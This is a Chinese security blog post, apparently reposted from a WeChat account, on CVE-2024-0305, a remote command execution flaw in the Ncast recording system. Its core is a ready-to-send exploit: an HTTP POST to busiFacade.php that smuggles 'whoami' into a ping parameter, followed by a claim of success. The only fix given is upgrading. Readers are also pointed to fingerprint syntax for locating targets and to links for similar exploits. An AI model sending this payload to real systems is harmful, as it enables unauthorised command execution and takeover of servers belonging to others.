CVE-2024-0305 RCE漏洞（附EXP）

admin

103124
文章

87
评论

2024年1月16日23:20:47评论100 views字数 884阅读2分56秒阅读模式

声明：该公众号大部分文章来自作者日常学习笔记，也有部分文章是经过作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

现在只对常读和星标的公众号才展示大图推送，建议大家把阿无安全“设为星标”，否则可能看不到了！

0x01 前言

Ncast盈可视高清智能录播系统是广州盈可视电子科技有限公司的一款产品。该系统存在RCE漏洞，攻击者可以利用此漏洞执行任意命令能够利用该漏洞获取服务器权限，导致服务器沦陷。

0x02 漏洞影响

影响版本

Ncast 2007Ncast 2017

0x03 漏洞利用

界面是这个酱紫

CVE-2024-0305 RCE漏洞（附EXP）

EXP如下：

POST /classes/common/busiFacade.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: closeContent-Length: 102Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequest{"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | whoami"]}

success！

CVE-2024-0305 RCE漏洞（附EXP）

0x04 修复方案

请升级最新版本。

0x05 下载地址

点击下方名片进入公众号

回复【0305】获取指纹语法

原文始发于微信公众号（阿无安全）：CVE-2024-0305 RCE漏洞（附EXP）

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2024-0305 RCE漏洞（附EXP）

速达软件 V.NET home接口处存在RCE漏洞

致远OA移动智能办公平台存在Session敏感信息泄露漏洞

【1day】畅捷通T+ keyEdit.aspx接口处存在SQL注入漏洞

AJ-Report开源数据大屏 verification 远程命令执行漏洞

【漏洞预警】runc <1.2.0-rc.1 systemd属性注入漏洞CVE-2024-3154

Primeton EOS Platform jmx反序列化远程代码执行

ZenTao(禅道)身份认证绕过漏洞 QVD-2024-15263(附工具)

【未公开】LiveGBS-信息泄漏-list

Jan 任意文件读取/下载(AFR/AFD) 漏洞

Jan 任意文件上传漏洞

发表评论

在线咨询

微信